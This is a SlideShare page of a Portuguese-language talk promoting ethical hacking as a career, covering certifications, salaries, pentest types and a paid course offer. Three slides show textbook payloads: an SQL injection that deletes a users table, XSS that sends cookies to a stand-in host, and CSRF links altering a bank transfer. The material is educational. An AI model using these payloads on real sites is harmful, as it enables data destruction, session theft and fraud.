SlideShare uma empresa Scribd logo

Importância do profissional Hacker ético no mercado de trabalho

Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção

O documento descreve a importância dos profissionais conhecidos como Hackers Éticos ou Pentesters no mercado de segurança da informação. Apresenta as credenciais e experiência do autor Marcos Flávio como professor, consultor e especialista na área. Resume os principais tópicos abordados como as certificações, atividades, salários e oportunidades na profissão de Hacker Ético. Oferece um curso de treinamento em fundamentos de hacking ético a preço reduzido.

Tecnologia
1 de 45
Baixar para ler offline
A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com
Marcos Flávio Araújo Assunção Formação: Mestre em Sistemas de Informação pela Universidade Fumec Especialista em Redes de Computadores pela ESAB Especialista em Docência para o ensino profissional pelo Senac Minas Graduado em Engenharia de Software pelo Centro Universitário UMA Atuação: Professor universitário no Centro Universitário UNA Orientador de curso no Senac Minas Consultor e palestrante em segurança de redes e ensino profissionalizante
Marcos Flávio Araújo Assunção Certificações CEH CCNA Cisco ITQ Publicações: Guia do Hacker Brasileiro Desafio Linux Hacker Segredos do Hacker Ético (5 edições) Honeypots e Honeynets Wireless Hacking Projetos: Valhala Honeypot
Por que a área de IT Security cresce tanto?
Principais problemas (Fonte: govtech.com)
Como o mercado vê o Hacker ético profissional?
Forbes – Hacker Ético é uma das principais carreiras do futuro
Governo americano recruta hackers globodigital
Cresce a busca pelo Hacker Ético jornal-o-globo
MCT convida movimento Hacker brasilgov
Precisa-se de Hackers experientes estadominas-online
Quanto é o salário de um Pentester (Ethical Hacker) ?
Fonte: indeed.com
Pagamento médio CEH (Fonte: softwareadvice.com)
Linkedin: a fonte de oportunidades em Ethical Hacking
Freelancing em Ethical Hacking
O que faz um profissional Hacker Ético / Pentester ?
Penetration Test (Teste de Invasão)  Consiste em utilizar técnicas de Hackers em testes de stress da segurança de redes e sistemas  É a principal ferramenta de um Hacker Ético  CEH, LPT, Ethical Hacking Foundation, OCSP, GWAPT, GPEN, etc.
Padrões e entidades que exigem Penetration Tests
Teste de “stress” – Uma necessidade real
Teste de “stress” - Pressão capacete
Teste de “stress” - Temperatura flame-test-helmet
Fases de um PenTest
Tipos de Penetration Test Black Box White Box Gray Box
Black Box Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.
Gray Box Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.
White Box Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.
Níveis de um Pentester / Ethical Hacker Nível 1 – Júnior – Tool based Penetration Tester: Esse profissional é aquele que somente conhece as ferramentas básicas para o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. Muitas vezes aprenderam as técnicas em treinamentos específicos. Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e GWapt Nível 2 – Pleno – Coding based Penetration Tester: Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda está limitado ao teste de vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções existentes, como criar novos módulos para o Metasploit. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Temos nesse nível o OSCP. Nível 3 – Sênior – Vulnerability Researcher: Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. Ainda não existe uma certificação de peso neste nível.
Certificações de Ethical Hacking
EXIN Ethical Hacking Foundation
EC-COUNCIL Certified Ethical Hacker (CEH)
EC-COUNCIL ECSA Pentest
ECCOUNCIL Licensed Penetration Tester
GIAC - GPEN
GIAC GWAPT
Offensive Security Certified Professional
Exemplos de vulnerabilidades testadas
Falhas de softwares  Buffer Overflows (Stack e Heap)  Strings de format vulneráveis  Memory corruption  Injection (SQL, XPATH, CMD, XSS, CSRF)  Permissões incorretas
SQL Injection GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
Cross Site Scripting <XSS>  <script> alert(‘Oi’!) </script>  <script> location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>  <a href=“javas&#99;ript&#35;[código]>  <div style=“behaviour: url([código]);”>  <body onload=“[código]”>  <img src=“javascript:[código]”>
Cross Site Request Forgery (CSRF)  Exemplo: Maria está logada no site do banco e a URL da transação é: http://banco.com/transf?conta=MARIA&quantia=100 Um ataque pode criar um link que altera o valor da transação: <a href=http://banco.com/transf?conta=MARIA$quantia=100000> Ou uma imagem “falsa”: <img src=http://banco.com/transf?conta=MARIA$quantia=100000>
Quero atuar na área. Como começar?
Treinamento em Fundamentos de Ethical Hacking • 21 horas de vídeos • 175 aulas • Acesso ilimitado e eterno • Certificado internacional • Conteúdo aborda a maioria das certificações de PenTest • 50% de desconto: pague apenas 100 reais pelo curso. Acesse para aproveitar a promoção: www.marcosflavio.com.br
Dúvidas?
A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com

Recomendados

Segurança Cibernética
Segurança CibernéticaSegurança Cibernética
Segurança Cibernética
Bruno Miranda
 
Crimes virtuais conceitos e leis
Crimes virtuais conceitos e leisCrimes virtuais conceitos e leis
Crimes virtuais conceitos e leis
Ana Rodrigues
 
Segurança Digital
Segurança DigitalSegurança Digital
Segurança Digital
MariaEduardaVale4
 
Ameacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfAmeacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdf
Edkallenn Lima
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
MaraLuizaGonalvesFre
 
Segurança da Informação
Segurança da InformaçãoSegurança da Informação
Segurança da Informação
Fábio Ferreira
 
426821332 doutrina-e-metodo-fundamentos esi-20
426821332 doutrina-e-metodo-fundamentos esi-20426821332 doutrina-e-metodo-fundamentos esi-20
426821332 doutrina-e-metodo-fundamentos esi-20
Triplo Sof
 
Forense Remota utilizando ferramentas Open Source
Forense Remota utilizando ferramentas Open SourceForense Remota utilizando ferramentas Open Source
Forense Remota utilizando ferramentas Open Source
Julio Cesar Roque Benatto
 

Recomendados

Segurança Cibernética
Segurança CibernéticaSegurança Cibernética
Segurança Cibernética
Bruno Miranda
 
Crimes virtuais conceitos e leis
Crimes virtuais conceitos e leisCrimes virtuais conceitos e leis
Crimes virtuais conceitos e leis
Ana Rodrigues
 
Segurança Digital
Segurança DigitalSegurança Digital
Segurança Digital
MariaEduardaVale4
 
Ameacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfAmeacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdf
Edkallenn Lima
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
MaraLuizaGonalvesFre
 
Segurança da Informação
Segurança da InformaçãoSegurança da Informação
Segurança da Informação
Fábio Ferreira
 
426821332 doutrina-e-metodo-fundamentos esi-20
426821332 doutrina-e-metodo-fundamentos esi-20426821332 doutrina-e-metodo-fundamentos esi-20
426821332 doutrina-e-metodo-fundamentos esi-20
Triplo Sof
 
Forense Remota utilizando ferramentas Open Source
Forense Remota utilizando ferramentas Open SourceForense Remota utilizando ferramentas Open Source
Forense Remota utilizando ferramentas Open Source
Julio Cesar Roque Benatto
 
Wireless Hacking - Ataques e Segurança de redes sem fio
Wireless Hacking - Ataques e Segurança de redes sem fioWireless Hacking - Ataques e Segurança de redes sem fio
Wireless Hacking - Ataques e Segurança de redes sem fio
Marcos Flávio Araújo Assunção
 
Redes de Computadores
Redes de ComputadoresRedes de Computadores
Redes de Computadores
deisiweg
 
Seguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - NovoSeguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - Novo
Luiz Arthur
 
Curso de Segurança do Conhecimento Empresarial - Contra Espionagem
Curso de Segurança do Conhecimento Empresarial - Contra EspionagemCurso de Segurança do Conhecimento Empresarial - Contra Espionagem
Curso de Segurança do Conhecimento Empresarial - Contra Espionagem
Milton R. Almeida
 
Uso consciente da internet e cyberbullying
Uso consciente da internet e cyberbullyingUso consciente da internet e cyberbullying
Uso consciente da internet e cyberbullying
Data Security
 
Cibersegurança ou uma questão de sobrevivência?
Cibersegurança ou uma questão de sobrevivência?Cibersegurança ou uma questão de sobrevivência?
Cibersegurança ou uma questão de sobrevivência?
Filipe T. Moreira
 
CRIMES NA INTERNET
CRIMES NA INTERNETCRIMES NA INTERNET
CRIMES NA INTERNET
Nete quirino
 
Redes Sociais
Redes SociaisRedes Sociais
Redes Sociais
Joaquim Silva
 
Internet na vida das pessoas
Internet na vida das pessoasInternet na vida das pessoas
Internet na vida das pessoas
Stephane
 
Curso inteligência e contrainteligência
Curso inteligência e contrainteligênciaCurso inteligência e contrainteligência
Curso inteligência e contrainteligência
Milton R. Almeida
 
Criptografia
CriptografiaCriptografia
Criptografia
Cleber Ramos
 
Redes tecnologicas dr4 stc.
Redes tecnologicas dr4 stc.Redes tecnologicas dr4 stc.
Redes tecnologicas dr4 stc.
IsabelSatierf
 
STC NG5 DR4 Andreia
STC NG5 DR4 AndreiaSTC NG5 DR4 Andreia
STC NG5 DR4 Andreia
Alberto Casaca
 
43512935 projeto-de-redes
43512935 projeto-de-redes43512935 projeto-de-redes
43512935 projeto-de-redes
Marco Guimarães
 
Cyberbullying, acaba com isto!
Cyberbullying, acaba com isto!Cyberbullying, acaba com isto!
Cyberbullying, acaba com isto!
institutoduartelemos
 
STC Tecnologia Marco Dr2
STC Tecnologia Marco Dr2STC Tecnologia Marco Dr2
STC Tecnologia Marco Dr2
mega
 
Crimes virtuais
Crimes virtuais Crimes virtuais
Crimes virtuais
tecnocontabeis
 
Proteção e segurança de sistemas operacionais
Proteção e segurança de sistemas operacionaisProteção e segurança de sistemas operacionais
Proteção e segurança de sistemas operacionais
cleber_opo
 
Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall
Cleber Ramos
 
Deep web
Deep webDeep web
Deep web
Fatinha de Sousa
 
MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013
La Recuperación de La Santiago
 
The Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineThe Most Likeable Senior Executives Online
The Most Likeable Senior Executives Online
Likeable Media
 

Mais conteúdo relacionado

Mais procurados

Seguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - NovoSeguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - Novo
Luiz Arthur
 
Internet na vida das pessoas
Internet na vida das pessoasInternet na vida das pessoas
Internet na vida das pessoas
Stephane
 
Redes tecnologicas dr4 stc.
Redes tecnologicas dr4 stc.Redes tecnologicas dr4 stc.
Redes tecnologicas dr4 stc.
IsabelSatierf
 
STC Tecnologia Marco Dr2
STC Tecnologia Marco Dr2STC Tecnologia Marco Dr2
STC Tecnologia Marco Dr2
mega
 

Mais procurados (20)

Wireless Hacking - Ataques e Segurança de redes sem fio
Wireless Hacking - Ataques e Segurança de redes sem fioWireless Hacking - Ataques e Segurança de redes sem fio
Wireless Hacking - Ataques e Segurança de redes sem fio
 
Redes de Computadores
Redes de ComputadoresRedes de Computadores
Redes de Computadores
 
Seguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - NovoSeguranca da Informação - Introdução - Novo
Seguranca da Informação - Introdução - Novo
 
Curso de Segurança do Conhecimento Empresarial - Contra Espionagem
Curso de Segurança do Conhecimento Empresarial - Contra EspionagemCurso de Segurança do Conhecimento Empresarial - Contra Espionagem
Curso de Segurança do Conhecimento Empresarial - Contra Espionagem
 
Uso consciente da internet e cyberbullying
Uso consciente da internet e cyberbullyingUso consciente da internet e cyberbullying
Uso consciente da internet e cyberbullying
 
Cibersegurança ou uma questão de sobrevivência?
Cibersegurança ou uma questão de sobrevivência?Cibersegurança ou uma questão de sobrevivência?
Cibersegurança ou uma questão de sobrevivência?
 
CRIMES NA INTERNET
CRIMES NA INTERNETCRIMES NA INTERNET
CRIMES NA INTERNET
 
Redes Sociais
Redes SociaisRedes Sociais
Redes Sociais
 
Internet na vida das pessoas
Internet na vida das pessoasInternet na vida das pessoas
Internet na vida das pessoas
 
Curso inteligência e contrainteligência
Curso inteligência e contrainteligênciaCurso inteligência e contrainteligência
Curso inteligência e contrainteligência
 
Criptografia
CriptografiaCriptografia
Criptografia
 
Redes tecnologicas dr4 stc.
Redes tecnologicas dr4 stc.Redes tecnologicas dr4 stc.
Redes tecnologicas dr4 stc.
 
STC NG5 DR4 Andreia
STC NG5 DR4 AndreiaSTC NG5 DR4 Andreia
STC NG5 DR4 Andreia
 
43512935 projeto-de-redes
43512935 projeto-de-redes43512935 projeto-de-redes
43512935 projeto-de-redes
 
Cyberbullying, acaba com isto!
Cyberbullying, acaba com isto!Cyberbullying, acaba com isto!
Cyberbullying, acaba com isto!
 
STC Tecnologia Marco Dr2
STC Tecnologia Marco Dr2STC Tecnologia Marco Dr2
STC Tecnologia Marco Dr2
 
Crimes virtuais
Crimes virtuais Crimes virtuais
Crimes virtuais
 
Proteção e segurança de sistemas operacionais
Proteção e segurança de sistemas operacionaisProteção e segurança de sistemas operacionais
Proteção e segurança de sistemas operacionais
 
Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall
 
Deep web
Deep webDeep web
Deep web
 

Destaque

Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
switchingonthefuture
 
Teori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarTeori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasar
Farrel Pedroza
 
ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6
창훈 정
 
Transparencies ch07-pp274-283
Transparencies ch07-pp274-283Transparencies ch07-pp274-283
Transparencies ch07-pp274-283
lschmidt1170
 
7th math c2 -l15
7th math c2 -l157th math c2 -l15
7th math c2 -l15
jdurst65
 
痛風者救星
痛風者救星痛風者救星
痛風者救星
lys167
 
1 luce è libertà
1 luce è libertà1 luce è libertà
1 luce è libertà
mariadelia1
 
FameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceFameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & Marketplace
Michael Herlache
 

Destaque (20)

MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013MARZO 18 AL 23 DE 2013
MARZO 18 AL 23 DE 2013
 
The Most Likeable Senior Executives Online
The Most Likeable Senior Executives OnlineThe Most Likeable Senior Executives Online
The Most Likeable Senior Executives Online
 
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
Ives De Saeger - Creëer veerkracht en wendbaarheid in de huidige turbulente m...
 
Why Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from ParentsWhy Stittsville Needs a Public High School - Stories from Parents
Why Stittsville Needs a Public High School - Stories from Parents
 
Rompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiereRompere YouTube col Video Marketing: i segreti del mestiere
Rompere YouTube col Video Marketing: i segreti del mestiere
 
Teori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasarTeori%20kelistrikan%20dasar
Teori%20kelistrikan%20dasar
 
Vayu, the Ayurvedic neurology.
Vayu, the Ayurvedic neurology.Vayu, the Ayurvedic neurology.
Vayu, the Ayurvedic neurology.
 
ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6ActiveRecord Observers - RORLab Season 3-6
ActiveRecord Observers - RORLab Season 3-6
 
Transparencies ch07-pp274-283
Transparencies ch07-pp274-283Transparencies ch07-pp274-283
Transparencies ch07-pp274-283
 
Comparative and superlative
Comparative and superlativeComparative and superlative
Comparative and superlative
 
vivek
vivekvivek
vivek
 
7th math c2 -l15
7th math c2 -l157th math c2 -l15
7th math c2 -l15
 
Prepaid Vs Post-paid Energy
Prepaid Vs Post-paid EnergyPrepaid Vs Post-paid Energy
Prepaid Vs Post-paid Energy
 
Climatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in SyriaClimatic Changes and Yellow Rust Outbreak in Syria
Climatic Changes and Yellow Rust Outbreak in Syria
 
Catholic doctor
Catholic doctorCatholic doctor
Catholic doctor
 
Organizing with online elections
Organizing with online electionsOrganizing with online elections
Organizing with online elections
 
痛風者救星
痛風者救星痛風者救星
痛風者救星
 
1 luce è libertà
1 luce è libertà1 luce è libertà
1 luce è libertà
 
FameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & MarketplaceFameLinked - The Fame Network & Marketplace
FameLinked - The Fame Network & Marketplace
 
100%
100%100%
100%
 

Semelhante a Importância do profissional Hacker ético no mercado de trabalho

Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
Alisson Fuckner
 
Slides ataques e vulnerabilidades
Slides ataques e vulnerabilidadesSlides ataques e vulnerabilidades
Slides ataques e vulnerabilidades
cheeshirecat
 

Semelhante a Importância do profissional Hacker ético no mercado de trabalho (20)

Ethical Hacker - Segurança da Informação
Ethical Hacker - Segurança da InformaçãoEthical Hacker - Segurança da Informação
Ethical Hacker - Segurança da Informação
 
Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017Ethical Hacking - Campus Party Brasília 2017
Ethical Hacking - Campus Party Brasília 2017
 
Introdução de teste de segurança app web
Introdução de teste de segurança app webIntrodução de teste de segurança app web
Introdução de teste de segurança app web
 
Aula de seguranca (1)
Aula de seguranca (1)Aula de seguranca (1)
Aula de seguranca (1)
 
Hacker Ético
Hacker ÉticoHacker Ético
Hacker Ético
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informação
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar [GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
[GUTS-RS] - Testes de Segurança: O que preciso saber para planejar
 
Desenvolvimento de exploits
Desenvolvimento de exploitsDesenvolvimento de exploits
Desenvolvimento de exploits
 
Java security
Java securityJava security
Java security
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
Semana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdfSemana34b - Brute Force Online.pdf
Semana34b - Brute Force Online.pdf
 
Analise de Vulnerabilidade
Analise de VulnerabilidadeAnalise de Vulnerabilidade
Analise de Vulnerabilidade
 
Slides ataques e vulnerabilidades
Slides ataques e vulnerabilidadesSlides ataques e vulnerabilidades
Slides ataques e vulnerabilidades
 
Artigo cientifico
Artigo cientifico Artigo cientifico
Artigo cientifico
 
PenTest com Kali linux - VI Engitec
PenTest com Kali linux - VI EngitecPenTest com Kali linux - VI Engitec
PenTest com Kali linux - VI Engitec
 
Como começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day FatecComo começar na área de PenTest - Womcy Security Day Fatec
Como começar na área de PenTest - Womcy Security Day Fatec
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira DantasP3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
 

Último

ATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docx
ATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docxATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docx
ATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docx
2m Assessoria
 
ATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docx
ATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docxATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docx
ATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docx
2m Assessoria
 
Assessement Boas Praticas em Kubernetes.pdf
Assessement Boas Praticas em Kubernetes.pdfAssessement Boas Praticas em Kubernetes.pdf
Assessement Boas Praticas em Kubernetes.pdf
Natalia Granato
 
ATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docx
ATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docxATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docx
ATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docx
2m Assessoria
 

Último (6)

Boas práticas de programação com Object Calisthenics
Boas práticas de programação com Object CalisthenicsBoas práticas de programação com Object Calisthenics
Boas práticas de programação com Object Calisthenics
 
ATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docx
ATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docxATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docx
ATIVIDADE 1 - CUSTOS DE PRODUÇÃO - 52_2024.docx
 
ATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docx
ATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docxATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docx
ATIVIDADE 1 - LOGÍSTICA EMPRESARIAL - 52_2024.docx
 
Assessement Boas Praticas em Kubernetes.pdf
Assessement Boas Praticas em Kubernetes.pdfAssessement Boas Praticas em Kubernetes.pdf
Assessement Boas Praticas em Kubernetes.pdf
 
Padrões de Projeto: Proxy e Command com exemplo
Padrões de Projeto: Proxy e Command com exemploPadrões de Projeto: Proxy e Command com exemplo
Padrões de Projeto: Proxy e Command com exemplo
 
ATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docx
ATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docxATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docx
ATIVIDADE 1 - GCOM - GESTÃO DA INFORMAÇÃO - 54_2024.docx
 

Importância do profissional Hacker ético no mercado de trabalho

  • 1. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com
  • 2. Marcos Flávio Araújo Assunção Formação: Mestre em Sistemas de Informação pela Universidade Fumec Especialista em Redes de Computadores pela ESAB Especialista em Docência para o ensino profissional pelo Senac Minas Graduado em Engenharia de Software pelo Centro Universitário UMA Atuação: Professor universitário no Centro Universitário UNA Orientador de curso no Senac Minas Consultor e palestrante em segurança de redes e ensino profissionalizante
  • 3. Marcos Flávio Araújo Assunção Certificações CEH CCNA Cisco ITQ Publicações: Guia do Hacker Brasileiro Desafio Linux Hacker Segredos do Hacker Ético (5 edições) Honeypots e Honeynets Wireless Hacking Projetos: Valhala Honeypot
  • 4. Por que a área de IT Security cresce tanto?
  • 6. Como o mercado vê o Hacker ético profissional?
  • 7. Forbes – Hacker Ético é uma das principais carreiras do futuro
  • 8. Governo americano recruta hackers globodigital
  • 9. Cresce a busca pelo Hacker Ético jornal-o-globo
  • 10. MCT convida movimento Hacker brasilgov
  • 11. Precisa-se de Hackers experientes estadominas-online
  • 12. Quanto é o salário de um Pentester (Ethical Hacker) ?
  • 14. Pagamento médio CEH (Fonte: softwareadvice.com)
  • 15. Linkedin: a fonte de oportunidades em Ethical Hacking
  • 17. O que faz um profissional Hacker Ético / Pentester ?
  • 18. Penetration Test (Teste de Invasão)  Consiste em utilizar técnicas de Hackers em testes de stress da segurança de redes e sistemas  É a principal ferramenta de um Hacker Ético  CEH, LPT, Ethical Hacking Foundation, OCSP, GWAPT, GPEN, etc.
  • 19. Padrões e entidades que exigem Penetration Tests
  • 20. Teste de “stress” – Uma necessidade real
  • 21. Teste de “stress” - Pressão capacete
  • 22. Teste de “stress” - Temperatura flame-test-helmet
  • 23. Fases de um PenTest
  • 24. Tipos de Penetration Test Black Box White Box Gray Box
  • 25. Black Box Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.
  • 26. Gray Box Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.
  • 27. White Box Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.
  • 28. Níveis de um Pentester / Ethical Hacker Nível 1 – Júnior – Tool based Penetration Tester: Esse profissional é aquele que somente conhece as ferramentas básicas para o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. Muitas vezes aprenderam as técnicas em treinamentos específicos. Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e GWapt Nível 2 – Pleno – Coding based Penetration Tester: Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda está limitado ao teste de vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções existentes, como criar novos módulos para o Metasploit. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Temos nesse nível o OSCP. Nível 3 – Sênior – Vulnerability Researcher: Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. Ainda não existe uma certificação de peso neste nível.
  • 30. EXIN Ethical Hacking Foundation
  • 38. Falhas de softwares  Buffer Overflows (Stack e Heap)  Strings de format vulneráveis  Memory corruption  Injection (SQL, XPATH, CMD, XSS, CSRF)  Permissões incorretas
  • 39. SQL Injection GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
  • 40. Cross Site Scripting <XSS>  <script> alert(‘Oi’!) </script>  <script> location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>  <a href=“javas&#99;ript&#35;[código]>  <div style=“behaviour: url([código]);”>  <body onload=“[código]”>  <img src=“javascript:[código]”>
  • 41. Cross Site Request Forgery (CSRF)  Exemplo: Maria está logada no site do banco e a URL da transação é: http://banco.com/transf?conta=MARIA&quantia=100 Um ataque pode criar um link que altera o valor da transação: <a href=http://banco.com/transf?conta=MARIA$quantia=100000> Ou uma imagem “falsa”: <img src=http://banco.com/transf?conta=MARIA$quantia=100000>
  • 42. Quero atuar na área. Como começar?
  • 43. Treinamento em Fundamentos de Ethical Hacking • 21 horas de vídeos • 175 aulas • Acesso ilimitado e eterno • Certificado internacional • Conteúdo aborda a maioria das certificações de PenTest • 50% de desconto: pague apenas 100 reais pelo curso. Acesse para aproveitar a promoção: www.marcosflavio.com.br
  • 45. A importância do profissional Hacker Ético no mercado Marcos Flávio Araújo Assunção mflavio@defhack.com